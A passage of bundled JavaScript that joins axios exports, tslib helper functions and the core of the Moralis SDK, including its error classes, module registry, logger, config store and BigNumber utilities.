// Expose mergeConfig
$57966c7e0affc4cb$var$axios.mergeConfig = (0, $f85fda54cd977b19$export$2e2bcd8739ae039);
$57966c7e0affc4cb$var$axios.AxiosHeaders = (0, $866cce54f6bdfb0c$export$2e2bcd8739ae039);
$57966c7e0affc4cb$var$axios.formToJSON = (thing)=>(0, $5f8142930b3b943f$export$2e2bcd8739ae039)((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isHTMLForm(thing) ? new FormData(thing) : thing);
$57966c7e0affc4cb$var$axios.HttpStatusCode = (0, $f919374d785e9fb8$export$2e2bcd8739ae039);
$57966c7e0affc4cb$var$axios.default = $57966c7e0affc4cb$var$axios;
var // this module should only have a default export
$57966c7e0affc4cb$export$2e2bcd8739ae039 = $57966c7e0affc4cb$var$axios;


// This module is intended to unwrap Axios default export as named.
// Keep top-level export same with static properties
// so that it can keep same with es module or cjs
const { Axios: $b302555736d21bd7$export$1c00760e9e5a4e95, AxiosError: $b302555736d21bd7$export$c1fbed17c2f6a328, CanceledError: $b302555736d21bd7$export$1ab0c6b20d94fa14, isCancel: $b302555736d21bd7$export$3b22524397b493c6, CancelToken: $b302555736d21bd7$export$fd08e3cb425f0d61, VERSION: $b302555736d21bd7$export$a4ad2735b021c132, all: $b302555736d21bd7$export$84bf76cd7afc7469, Cancel: $b302555736d21bd7$export$848c9b7ead0df967, isAxiosError: $b302555736d21bd7$export$fbafdbe06a5b5a9a, spread: $b302555736d21bd7$export$3ae0fd4797ed47c8, toFormData: $b302555736d21bd7$export$10ae0d317ea97f8b, AxiosHeaders: $b302555736d21bd7$export$4e7d6ff0f3e6520, HttpStatusCode: $b302555736d21bd7$export$a972f69c851492b3, formToJSON: $b302555736d21bd7$export$86d7c59254d6a2c9, mergeConfig: $b302555736d21bd7$export$7ec1ebcfa9d8bd6a } = (0, $57966c7e0affc4cb$export$2e2bcd8739ae039);


/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $10891f2cb3e98601$var$extendStatics = function(d, b) {
    $10891f2cb3e98601$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $10891f2cb3e98601$var$extendStatics(d, b);
};
function $10891f2cb3e98601$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $10891f2cb3e98601$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $10891f2cb3e98601$var$__assign = function() {
    $10891f2cb3e98601$var$__assign = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $10891f2cb3e98601$var$__assign.apply(this, arguments);
};
function $10891f2cb3e98601$var$__awaiter(thisArg, _arguments, P, generator) {
    function adopt(value) {
        return value instanceof P ? value : new P(function(resolve) {
            resolve(value);
        });
    }
    return new (P || (P = Promise))(function(resolve, reject) {
        function fulfilled(value) {
            try {
                step(generator.next(value));
            } catch (e) {
                reject(e);
            }
        }
        function rejected(value) {
            try {
                step(generator["throw"](value));
            } catch (e) {
                reject(e);
            }
        }
        function step(result) {
            result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected);
        }
        step((generator = generator.apply(thisArg, _arguments || [])).next());
    });
}
function $10891f2cb3e98601$var$__generator(thisArg, body) {
    var _ = {
        label: 0,
        sent: function() {
            if (t[0] & 1) throw t[1];
            return t[1];
        },
        trys: [],
        ops: []
    }, f, y, t, g;
    return g = {
        next: verb(0),
        "throw": verb(1),
        "return": verb(2)
    }, typeof Symbol === "function" && (g[Symbol.iterator] = function() {
        return this;
    }), g;
    function verb(n) {
        return function(v) {
            return step([
                n,
                v
            ]);
        };
    }
    function step(op) {
        if (f) throw new TypeError("Generator is already executing.");
        while(g && (g = 0, op[0] && (_ = 0)), _)try {
            if (f = 1, y && (t = op[0] & 2 ? y["return"] : op[0] ? y["throw"] || ((t = y["return"]) && t.call(y), 0) : y.next) && !(t = t.call(y, op[1])).done) return t;
            if (y = 0, t) op = [
                op[0] & 2,
                t.value
            ];
            switch(op[0]){
                case 0:
                case 1:
                    t = op;
                    break;
                case 4:
                    _.label++;
                    return {
                        value: op[1],
                        done: false
                    };
                case 5:
                    _.label++;
                    y = op[1];
                    op = [
                        0
                    ];
                    continue;
                case 7:
                    op = _.ops.pop();
                    _.trys.pop();
                    continue;
                default:
                    if (!(t = _.trys, t = t.length > 0 && t[t.length - 1]) && (op[0] === 6 || op[0] === 2)) {
                        _ = 0;
                        continue;
                    }
                    if (op[0] === 3 && (!t || op[1] > t[0] && op[1] < t[3])) {
                        _.label = op[1];
                        break;
                    }
                    if (op[0] === 6 && _.label < t[1]) {
                        _.label = t[1];
                        t = op;
                        break;
                    }
                    if (t && _.label < t[2]) {
                        _.label = t[2];
                        _.ops.push(op);
                        break;
                    }
                    if (t[2]) _.ops.pop();
                    _.trys.pop();
                    continue;
            }
            op = body.call(thisArg, _);
        } catch (e) {
            op = [
                6,
                e
            ];
            y = 0;
        } finally{
            f = t = 0;
        }
        if (op[0] & 5) throw op[1];
        return {
            value: op[0] ? op[1] : void 0,
            done: true
        };
    }
}
function $10891f2cb3e98601$var$__spreadArray(to, from, pack) {
    if (pack || arguments.length === 2) {
        for(var i = 0, l = from.length, ar; i < l; i++)if (ar || !(i in from)) {
            if (!ar) ar = Array.prototype.slice.call(from, 0, i);
            ar[i] = from[i];
        }
    }
    return to.concat(ar || Array.prototype.slice.call(from));
}
var $10891f2cb3e98601$export$6a8195ee8dd1cc03;
(function(ModuleType) {
    ModuleType["API"] = "api";
    ModuleType["DEFAULT"] = "default";
})($10891f2cb3e98601$export$6a8195ee8dd1cc03 || ($10891f2cb3e98601$export$6a8195ee8dd1cc03 = {}));
/**
 * Verify if the provided class is a api type.
 * Should be used as a Typescript type-guard
 *
 * @example
 * ```
 * if(isApiModule(module)){
 *  // module is types as ApiModule here
 * }
 * ```
 */ var $10891f2cb3e98601$export$c7ad6a95f5087549 = function(moralisClass) {
    if (moralisClass.type === $10891f2cb3e98601$export$6a8195ee8dd1cc03.API) return true;
    return false;
};
var $10891f2cb3e98601$export$643b9db13fb4e195;
(function(CoreErrorCode) {
    // Generic Core error
    CoreErrorCode["GENERIC_CORE_ERROR"] = "C0001";
    // A module wants to register with a name that already is registered
    CoreErrorCode["DUPLICATE_MODULE"] = "C0002";
    // The module is not registered
    CoreErrorCode["MODULE_NOT_FOUND"] = "C0003";
    // Error in validation check
    CoreErrorCode["VALIDATION_ERROR"] = "C0004";
    CoreErrorCode["INVALID_ARGUMENT"] = "C0005";
    CoreErrorCode["REQUEST_ERROR"] = "C0006";
    CoreErrorCode["NO_DATA_FOUND"] = "C0007";
    CoreErrorCode["NOT_INITIALIZED"] = "C0008";
    CoreErrorCode["ALREADY_INITIALIZED"] = "C0009";
    CoreErrorCode["METHOD_FAILED"] = "C0010";
    CoreErrorCode["STATE_MACHINE_STARTED"] = "C0011";
    CoreErrorCode["STATE_MACHINE_NOT_STARTED"] = "C0012";
    CoreErrorCode["CONFIG_KEY_NOT_EXIST"] = "C0013";
    CoreErrorCode["CONFIG_INVALID_VALUE"] = "C0014";
    CoreErrorCode["CONFIG_KEY_ALREADY_EXIST"] = "C0015";
    CoreErrorCode["INVALID_DATA"] = "C0016";
    CoreErrorCode["BIG_NUMBER_ERROR"] = "C0500";
    CoreErrorCode["NOT_IMPLEMENTED"] = "C9000";
})($10891f2cb3e98601$export$643b9db13fb4e195 || ($10891f2cb3e98601$export$643b9db13fb4e195 = {}));
var $10891f2cb3e98601$export$dbc62e876b4a53ce;
(function(ApiErrorCode) {
    ApiErrorCode["GENERIC_API_ERROR"] = "A0001";
    ApiErrorCode["PAGE_LIMIT_EXCEEDED"] = "A0002";
    ApiErrorCode["API_KEY_NOT_SET"] = "A0003";
    ApiErrorCode["INVALID_PARAMS"] = "A0004";
    ApiErrorCode["NOT_FOUND"] = "A0404";
    ApiErrorCode["NOT_IMPLEMENTED"] = "A9000";
})($10891f2cb3e98601$export$dbc62e876b4a53ce || ($10891f2cb3e98601$export$dbc62e876b4a53ce = {}));
var $10891f2cb3e98601$export$48dd48497c6cb373;
(function(AuthErrorCode) {
    AuthErrorCode["GENERIC_AUTH_ERROR"] = "U0001";
    AuthErrorCode["INCORRECT_NETWORK"] = "U0002";
    AuthErrorCode["INCORRECT_PARAMETER"] = "U0003";
    AuthErrorCode["NOT_IMPLEMENTED"] = "U9000";
})($10891f2cb3e98601$export$48dd48497c6cb373 || ($10891f2cb3e98601$export$48dd48497c6cb373 = {}));
var $10891f2cb3e98601$export$c7aa09645659b4e0;
(function(StreamErrorCode) {
    StreamErrorCode["GENERIC_STREAM_ERROR"] = "S0001";
    StreamErrorCode["INCORRECT_NETWORK"] = "S0002";
    StreamErrorCode["INCORRECT_PARAMETER"] = "S0003";
    StreamErrorCode["INVALID_SIGNATURE"] = "S0004";
    StreamErrorCode["NOT_IMPLEMENTED"] = "S9000";
})($10891f2cb3e98601$export$c7aa09645659b4e0 || ($10891f2cb3e98601$export$c7aa09645659b4e0 = {}));
var $10891f2cb3e98601$export$a0860861f22cc326 = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(MoralisError, _super);
    function MoralisError(_a) {
        var message = _a.message, code = _a.code, details = _a.details, cause = _a.cause;
        var _this = // @ts-ignore Typescript does not recognise 'cause' ? OR we have wrong TS version
        _super.call(this, MoralisError.makeMessage(message, code), {
            cause: cause
        }) || this;
        _this.name = "Moralis SDK Error";
        _this.isMoralisError = true;
        // Set prototype manually, as required since Typescript 2.2: https://www.typescriptlang.org/docs/handbook/release-notes/typescript-2-2.html#example
        Object.setPrototypeOf(_this, MoralisError.prototype);
        _this.code = code;
        _this.details = details;
        if (cause) {
            _this.cause = cause;
            if ("stack" in cause) _this.stack = "".concat(_this.stack, "\nCAUSE: ").concat(cause.stack);
        }
        if (Error.captureStackTrace) Error.captureStackTrace(_this, MoralisError);
        return _this;
    }
    MoralisError.makeMessage = function(message, code) {
        return "[".concat(code, "] ").concat(message);
    };
    return MoralisError;
}(Error);
var $10891f2cb3e98601$export$11e3a3d7d0a8e488 = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(CoreError, _super);
    function CoreError(options) {
        var _this = _super.call(this, options) || this;
        _this.name = "Moralis SDK Core Error";
        if (Error.captureStackTrace) Error.captureStackTrace(_this, CoreError);
        return _this;
    }
    return CoreError;
}($10891f2cb3e98601$export$a0860861f22cc326);
var $10891f2cb3e98601$export$1e54abe040eff0f = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(MoralisApiError, _super);
    function MoralisApiError(options) {
        var _this = _super.call(this, options) || this;
        _this.name = "Moralis SDK API Error";
        if (Error.captureStackTrace) Error.captureStackTrace(_this, MoralisApiError);
        return _this;
    }
    return MoralisApiError;
}($10891f2cb3e98601$export$a0860861f22cc326);
var $10891f2cb3e98601$export$9cba5fbb5ec3200e = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(MoralisAuthError, _super);
    function MoralisAuthError(options) {
        var _this = _super.call(this, options) || this;
        _this.name = "Moralis Auth Error";
        if (Error.captureStackTrace) Error.captureStackTrace(_this, MoralisAuthError);
        return _this;
    }
    return MoralisAuthError;
}($10891f2cb3e98601$export$a0860861f22cc326);
var $10891f2cb3e98601$export$b95da19793ffce92 = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(MoralisStreamError, _super);
    function MoralisStreamError(options) {
        var _this = _super.call(this, options) || this;
        _this.name = "Moralis Stream Error";
        if (Error.captureStackTrace) Error.captureStackTrace(_this, MoralisStreamError);
        return _this;
    }
    return MoralisStreamError;
}($10891f2cb3e98601$export$a0860861f22cc326);
var $10891f2cb3e98601$export$e8ac0035cab6a95c = function(error) {
    if (!(error instanceof Error)) return false;
    if (!error.isMoralisError) return false;
    return true;
};
/**
 * MoralisModues handles all registered modules.
 * Any package that is used in Moralis, should register itself via this class.
 * This allows cross-communication between modules and easy management of the modules
 *
 * This class is responsible for:
 * - registering new modules
 * - removing modules (in theory possible for exotic usecases, but might break the app if done after initialisation)
 * - getting individual modules by name, type or everything
 */ var $10891f2cb3e98601$export$6d8228690abc2da8 = /** @class */ function() {
    function Modules() {
        this.modules = new Map();
    }
    /**
     * Register and setup a new module by providing a module that is extended from BaseClass.
     * This will throw an error if the name is not unique
     * @param module the module that needs to be registered
     */ Modules.prototype.register = function(module) {
        if (this.modules.has(module.name)) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.DUPLICATE_MODULE,
            message: 'The module "'.concat(module.name, '" has already been registered.')
        });
        this.modules.set(module.name, module);
        module.setup();
    };
    /**
     * Returns the module with the given name.
     * This module should have been registered with `register`
     * @param name the module name
     * @returns a valid BaseModule
     * @throws a CoreError if no module with the given name has been registered
     */ Modules.prototype.get = function(name) {
        var module = this.modules.get(name);
        if (!module) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.MODULE_NOT_FOUND,
            message: 'Module "'.concat(name, '" does not exist.')
        });
        return module;
    };
    /**
     * Tries to return the module with the given name if exist. Otherwise returns null.
     * @param name the module name
     * @returns a valid BaseModule or null
     */ Modules.prototype.tryGet = function(name) {
        return this.modules.get(name) || null;
    };
    Modules.prototype.has = function(name) {
        return this.modules.has(name);
    };
    /**
     * Returns the network module with the provided name.
     * @param name the module name
     * @returns a valid ApiModule
     * @throws a CoreError if no network module with the given name has been registered
     */ Modules.prototype.getApi = function(name) {
        var module = this.modules.get(name);
        if (!module || !$10891f2cb3e98601$export$c7ad6a95f5087549(module)) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.MODULE_NOT_FOUND,
            message: 'No ApiModule found with the name "'.concat(name, '"')
        });
        return module;
    };
    /**
     * Remove the module with the provided name, if it has been registered,
     * @param name the module name
     * @throws a CoreError if the module cannot be found.
     */ Modules.prototype.remove = function(name) {
        var isRemoved = this.modules.delete(name);
        if (!isRemoved) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.MODULE_NOT_FOUND,
            message: 'Module "'.concat(name, '" does not exist.')
        });
    };
    /**
     * List all the registered modules
     * @returns an array of BaseModule that have been registered
     */ Modules.prototype.list = function() {
        return Array.from(this.modules.values());
    };
    /**
     * Returns the names of all registered modules
     */ Modules.prototype.listNames = function() {
        return this.list().map(function(module) {
            return module.name;
        });
    };
    /**
     * List all the registered api modules (eg. modules with the type CoreModuleType.API)
     */ Modules.prototype.listApis = function() {
        return this.list().filter($10891f2cb3e98601$export$c7ad6a95f5087549);
    };
    return Modules;
}();
var $10891f2cb3e98601$export$ebdca930f2e6a4b2 = {
    logLevel: {
        name: "logLevel",
        defaultValue: "info"
    },
    buidEnvironment: {
        name: "buidEnvironment",
        defaultValue: "browser"
    },
    defaultNetwork: {
        name: "defaultNetwork",
        defaultValue: "Evm"
    },
    product: {
        name: "product",
        defaultValue: undefined
    },
    /**
     * @description Maximal number of request retries.
     */ maxRetries: {
        name: "maxRetries",
        defaultValue: 2
    }
};
/* eslint-disable no-console */ var $10891f2cb3e98601$var$logLevelMap = {
    verbose: 5,
    debug: 4,
    info: 3,
    warning: 2,
    error: 1,
    off: 0
};
/**
 * LoggerController, responsible to create log messages for each module.
 * It should be created with the name of the module like `new Logger('module-name')`
 * It will then prefix any logs with that module-name for easy debugging
 * It will show only logs up to the specified `logLevel` in the MoralisConfig
 */ var $10891f2cb3e98601$export$e26347b971d391c9 = /** @class */ function() {
    function LoggerController(moduleName, config) {
        this.moduleName = moduleName;
        this.config = config;
    }
    LoggerController.create = function(moduleName, core) {
        return new LoggerController(moduleName, core.config);
    };
    Object.defineProperty(LoggerController.prototype, "level", {
        get: function() {
            return this.config.get($10891f2cb3e98601$export$ebdca930f2e6a4b2.logLevel);
        },
        enumerable: false,
        configurable: true
    });
    LoggerController.prototype._transport = function(level, message, details) {
        var logMessage = this._makeLogMessage(message);
        var args = [
            logMessage,
            details
        ].filter(function(arg) {
            return arg != null;
        });
        switch(level){
            case "error":
                console.error.apply(console, args);
                break;
            case "warn":
                console.warn.apply(console, args);
                break;
            case "log":
                console.log.apply(console, args);
                break;
        }
    };
    LoggerController.prototype._shouldLog = function(logLevel) {
        var level = $10891f2cb3e98601$var$logLevelMap[logLevel];
        var acceptedLevel = $10891f2cb3e98601$var$logLevelMap[this.level];
        if (level > acceptedLevel) return false;
        return true;
    };
    LoggerController.prototype._makeLogMessage = function(message) {
        return "Moralis[".concat(this.moduleName, "]: ").concat(message);
    };
    LoggerController.prototype.error = function(error, details) {
        if (!this._shouldLog("error")) return;
        var message = "";
        if (typeof error === "string") message = error;
        else if ($10891f2cb3e98601$export$e8ac0035cab6a95c(error)) {
            message = error.message;
            if (error.details) {
                if (details) details._errorDetails = error.details;
                else details = {
                    _errorDetails: error.details
                };
            }
        } else message = error.message;
        this._transport("error", message, details);
    };
    LoggerController.prototype.warn = function(message, details) {
        if (!this._shouldLog("warning")) return;
        this._transport("warn", message, details);
    };
    LoggerController.prototype.info = function(message, details) {
        if (!this._shouldLog("info")) return;
        this._transport("log", message, details);
    };
    LoggerController.prototype.debug = function(message, details) {
        if (!this._shouldLog("debug")) return;
        this._transport("log", message, details);
    };
    LoggerController.prototype.verbose = function(message, details) {
        if (!this._shouldLog("verbose")) return;
        this._transport("log", message, details);
    };
    return LoggerController;
}();
var $10891f2cb3e98601$export$29cd7b75162a9425 = /** @class */ function() {
    function Config() {
        this.items = new Map();
    }
    Config.prototype.registerKey = function(key, validator) {
        if (this.items.has(key.name)) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.CONFIG_KEY_ALREADY_EXIST,
            message: 'Key "'.concat(key.name, '" is already registered')
        });
        this.items.set(key.name, {
            key: key,
            value: key.defaultValue,
            validator: validator
        });
    };
    Config.prototype.getKeys = function() {
        return Array.from(this.items.keys());
    };
    Config.prototype.hasKey = function(key) {
        return this.items.has(key.name);
    };
    Config.prototype.get = function(keyOrName) {
        return this.getItem(keyOrName).value;
    };
    Config.prototype.set = function(keyOrName, value) {
        var item = this.getItem(keyOrName);
        var error = item.validator ? item.validator(value) : null;
        if (error) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.CONFIG_INVALID_VALUE,
            message: 'Cannot set this config. Invalid value for "'.concat(item.key.name, '". ').concat(error)
        });
        item.value = value;
    };
    Config.prototype.merge = function(values) {
        var _this = this;
        Object.keys(values).forEach(function(keyName) {
            _this.set(keyName, values[keyName]);
        });
    };
    Config.prototype.reset = function() {
        this.items.forEach(function(item) {
            item.value = item.key.defaultValue;
        });
    };
    Config.prototype.getItem = function(keyOrName) {
        var keyName = typeof keyOrName === "string" ? keyOrName : keyOrName.name;
        var item = this.items.get(keyName);
        if (!item) // This error occurs when a user tries to set a value for a specific key, but the key is not registered.
        // That situation may occur, when a moralis module is not registered (all keys are registered in the module setup step).
        // If you have this error, you should fix your code. Firstly, you should register all modules, later you can modify the configuration.
        throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.CONFIG_KEY_NOT_EXIST,
            message: 'Key "'.concat(keyName, '" is unregistered. Have you registered all required modules?')
        });
        return item;
    };
    return Config;
}();
var $10891f2cb3e98601$var$CoreConfigSetup = /** @class */ function() {
    function CoreConfigSetup() {}
    CoreConfigSetup.register = function(config) {
        config.registerKey($10891f2cb3e98601$export$ebdca930f2e6a4b2.logLevel);
        config.registerKey($10891f2cb3e98601$export$ebdca930f2e6a4b2.buidEnvironment);
        config.registerKey($10891f2cb3e98601$export$ebdca930f2e6a4b2.defaultNetwork);
        config.registerKey($10891f2cb3e98601$export$ebdca930f2e6a4b2.product);
        config.registerKey($10891f2cb3e98601$export$ebdca930f2e6a4b2.maxRetries);
    };
    return CoreConfigSetup;
}();
var $10891f2cb3e98601$var$LIB_VERSION = "2.22.4";
/**
 * The MoralisData class represents the value of a native currency (like ETH, SOL, BNB etc.)
 *
 * @internal
 * @category DataType
 */ var $10891f2cb3e98601$export$7b35fae42dd25f9e = /** @class */ function() {
    function MoralisData() {}
    return MoralisData;
}();
var $10891f2cb3e98601$export$da6af80d54a15d73 = /** @class */ function(_super) {
    $10891f2cb3e98601$var$__extends(MoralisDataObject, _super);
    function MoralisDataObject() {
        return _super !== null && _super.apply(this, arguments) || this;
    }
    return MoralisDataObject;
}($10891f2cb3e98601$export$7b35fae42dd25f9e);
var $10891f2cb3e98601$var$BigNumberFormatter = /** @class */ function() {
    function BigNumberFormatter() {}
    BigNumberFormatter.toDecimal = function(value, decimals) {
        if (decimals < 0) throw new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
            code: $10891f2cb3e98601$export$643b9db13fb4e195.BIG_NUMBER_ERROR,
            message: "Invalid decimals"
        });
        var result = value.toString();
        if (decimals === 0) return result;
        var isNegative = result.startsWith("-");
        if (isNegative) result = result.substring(1);
        result = result.padStart(decimals, "0");
        var dot = result.length - decimals;
        var whole = dot === 0 ? "0" : result.substring(0, dot);
        var fraction = result.substring(dot);
        result = "".concat(whole, ".").concat(fraction);
        while(result[result.length - 1] === "0" && result[result.length - 2] !== ".")result = result.substring(0, result.length - 1);
        if (isNegative) result = "-".concat(result);
        return result;
    };
    BigNumberFormatter.toHex = function(value) {
        var result = value.toString(16);
        var isNegative = result.startsWith("-");
        if (isNegative) result = result.substring(1);
        if (result.length % 2 !== 0) result = "0".concat(result);
        result = "0x".concat(result);
        if (isNegative) result = "-".concat(result);
        return result;
    };
    return BigNumberFormatter;
}();
var $10891f2cb3e98601$var$BigNumberParser = /** @class */ function() {
    function BigNumberParser() {}
    BigNumberParser.parseInt = function(value) {
        $10891f2cb3e98601$var$assertNotEmpty(value);
        if (typeof value === "string") {
            if (value.length === 0) throw $10891f2cb3e98601$var$createError("Value is empty");
            var isNegativeHex = value.startsWith("-0x");
            if (isNegativeHex) value = value.substring(1);
            var result = BigInt(value);
            if (isNegativeHex) result *= BigInt(-1);
            return result;
        }
        return BigInt(value);
    };
    // TODO: refactor to reduce complexity
    // eslint-disable-next-line complexity
    BigNumberParser.parseDecimal = function(value, decimals) {
        $10891f2cb3e98601$var$assertNotEmpty(value);
        var multiplier = $10891f2cb3e98601$var$getMultiplier(decimals);
        if (typeof value === "number") return BigInt(value) * multiplier;
        if (typeof value === "bigint") return value * multiplier;
        var isNegative = value.startsWith("-");
        if (isNegative) value = value.substring(1);
        var fragments = value.split(".");
        if (fragments.length > 2) throw $10891f2cb3e98601$var$createError("Value has more than one dot");
        if (fragments.some(function(fragment) {
            return !fragment;
        })) throw $10891f2cb3e98601$var$createError("Value has empty fragments");
        var result;
        if (fragments.length === 1) result = BigInt(fragments[0]) * multiplier;
        else {
            var whole = fragments[0];
            var fraction = fragments[1];
            if (fraction.length > decimals) throw $10891f2cb3e98601$var$createError("Value has too long fractional part: ".concat(fraction.length, ", max: ").concat(decimals));
            if (fraction.length < decimals) fraction = fraction.padEnd(decimals, "0");
            result = BigInt(whole) * multiplier + BigInt(fraction);
        }
        if (isNegative) result *= BigInt(-1);
        return result;
    };
    return BigNumberParser;
}();
function $10891f2cb3e98601$var$assertNotEmpty(value) {
    if (value === null) throw $10891f2cb3e98601$var$createError("Value is null");
    if (value === undefined) throw $10891f2cb3e98601$var$createError("Value is undefined");
}
function $10891f2cb3e98601$var$getMultiplier(decimals) {
    if (decimals < 0) throw $10891f2cb3e98601$var$createError("Invalid decimals");
    // decimals = 0, multiplier = 1
    // decimals = 1, multiplier = 10
    // decimals = 2, multiplier = 100
    // ...
    var ten = BigInt(10);
    var multiplier = BigInt(1);
    while(decimals-- > 0)multiplier *= ten;
    return multiplier;
}
function $10891f2cb3e98601$var$createError(message) {
    return new $10891f2cb3e98601$export$11e3a3d7d0a8e488({
        code: $10891f2cb3e98601$export$643b9db13fb4e195.BIG_NUMBER_ERROR,
        message: message
    });
}
/**
 * The BigNumber class is a MoralisData that references to a the value of a BigNumber
 *
 * @category DataType
 */ var $10891f2cb3e98601$export$d97aa349ed20696 = /** @class */ function() {
    function BigNumber(value) {
        this.value = value;
    }
    /**
     * Create a new instance of BigNumber from any valid address input.
     *
     * @param value - the BigNumberish type
     * @example BigNumber.create(12);
     * @example BigNumber.create("20");
     * @returns a new BigNumber instance
     */ BigNumber.create = function(value) {
        if (value instanceof BigNumber) return value;
        return new BigNumber($10891f2cb3e98601$var$BigNumberParser.parseInt(value));
    };
    BigNumber.fromJSON = function(json) {
        return BigNumber.create(json);
    };
    /**
     * Creates a new BigNumber from given decimals.
     * @param value
     * @param decimals - This is optional and defaults to 0
     * @example BigNumber.fromDecimal("1.23456789", 18);
     */ BigNumber.fromDecimal = function(value, decimals) {
        if (decimals === void 0) decimals = 0;
        return new BigNumber($10891f2cb3e98601$var$BigNumberParser.parseDecimal(value, decimals));
    };
    /**
     * @returns the value of this BigNumber as a BigInt
     * @example BigNumber.create(12).toBigInt();
     */ BigNumber.prototype.toBigInt = function() {
        return this.value;
    };
    /**
     * Adds a BigNumber to current BigNumber instance.
     * @param value - the BigNumberish to add
     * @returns the result of the addition
     * @example BigNumber.create(12).add(7);
     * @example BigNumber.create(12).add("1000000000000000000");
     */ BigNumber.prototype.add = function(value) {
        return new BigNumber(this.value + $10891f2cb3e98601$var$asBigInt(value));
    };
    /**
     * Subtracts a BigNumber from current BigNumber instance.
     * @param value - the BigNumberish to subtract
     * @returns the result of the subtraction
     * @example BigNumber.create(12).sub(7);
     * @example BigNumber.create("1000000000000000000").sub(20);
     */ BigNumber.prototype.sub = function(value) {
        return new BigNumber(this.value - $10891f2cb3e98601$var$asBigInt(value));
    };
    /**
     * Multiplies a BigNumber with current BigNumber instance.
     * @param value - the BigNumberish to multiply
     * @returns the result of the multiplication
     * @example BigNumber.create(12).mul(7);
     * @example BigNumber.create(12).mul("1000000000000000000");
     */ BigNumber.prototype.mul = function(value) {
        return new BigNumber(this.value * $10891f2cb3e98601$var$asBigInt(value));
    };
    /**
     * Divides a BigNumber with current BigNumber instance.
     * @param value - the BigNumberish to divide
     * @returns the result of the division
     * @example BigNumber.create(12).div(7);
     * @example BigNumber.create(1).div("1000000000000000000");
     */ BigNumber.prototype.div = function(value) {
        return new BigNumber(this.value / $10891f2cb3e98601$var$asBigInt(value));
    };
    /**
     * Checks the equality of the current BigNumber with another BigNumber.
     * @param value - the BigNumberish to compare
     * @returns true if the BigNumbers are equal
     * @example BigNumber.create(12).equals(BigNumber.create(12)); // true
     */ BigNumber.prototype.equals = function(value) {
        return this.value === value.toBigInt();
    };
    /**
     * Converts BigNumber instance to value in given decimals.
     * @param decimals - The decimals to convert to
     * @example BigNumber.create(12).toDecimal(18);
     */ BigNumber.prototype.toDecimal = function(decimals) {
        return $10891f2cb3e98601$var$BigNumberFormatter.toDecimal(this.value, decimals);
    };
    /**
     * Converts BigNumber instance to string.
     * @example BigNumber.create(12).toString();
     */ BigNumber.prototype.toString = function() {
        return this.value.toString();
    };
    /**
     * Converts BigNumber instance to hex string.
     * @example BigNumber.create(12).toHex();
     */ BigNumber.prototype.toHex = function() {
        return $10891f2cb3e98601$var$BigNumberFormatter.toHex(this.value);
    };
    /**
     * Converts BigNumber instance to hex string.
     * @example BigNumber.create(12).toJSON();
     */ BigNumber.prototype.toJSON = function() {
        return this.toHex();
    };
    return BigNumber;
}();
function $10891f2cb3e98601$var$asBigInt(value) {
    return $10891f2cb3e98601$export$d97aa349ed20696.create(value).toBigInt();
}
var $10891f2cb3e98601$export$8b9fef4a5a83984 = function(value) {
    return typeof value === "string" ? new Date(value) : value;
};
/**
 * Core is used in all Moralis applications
 * This class is **required** to be implemented in every app
 *
 * This class is responsible for:
 * - registering, removing and accessing modules
 * - accessing and changing the config
 */ var $10891f2cb3e98601$export$4143ab5b91744744 = /** @class */ function() {
    function Core(modules, config, logger) {
        var _this = this;
        this.modules = modules;
        this.config = config;
        this.logger = logger;
        this.name = Core.moduleName;
        this._isStarted = false;
        /**
         * Register all specified modules and configurations
         * @params array of all modules (any module that is extended from BaseModule) that you want to include
         */ this.registerModules = function(modules) {
            modules.forEach(_this.registerModule);
        };
        /**
         * Register a new module
         */ this.registerModule = function(module) {
            if ("create" in module) module = module.create(_this);
            _this.modules.register(module);
            _this.logger.verbose("Module registered", {
                module: module.name
            });
        };
        this.getModule = function(name) {
            return _this.modules.get(name);
        };
        /**
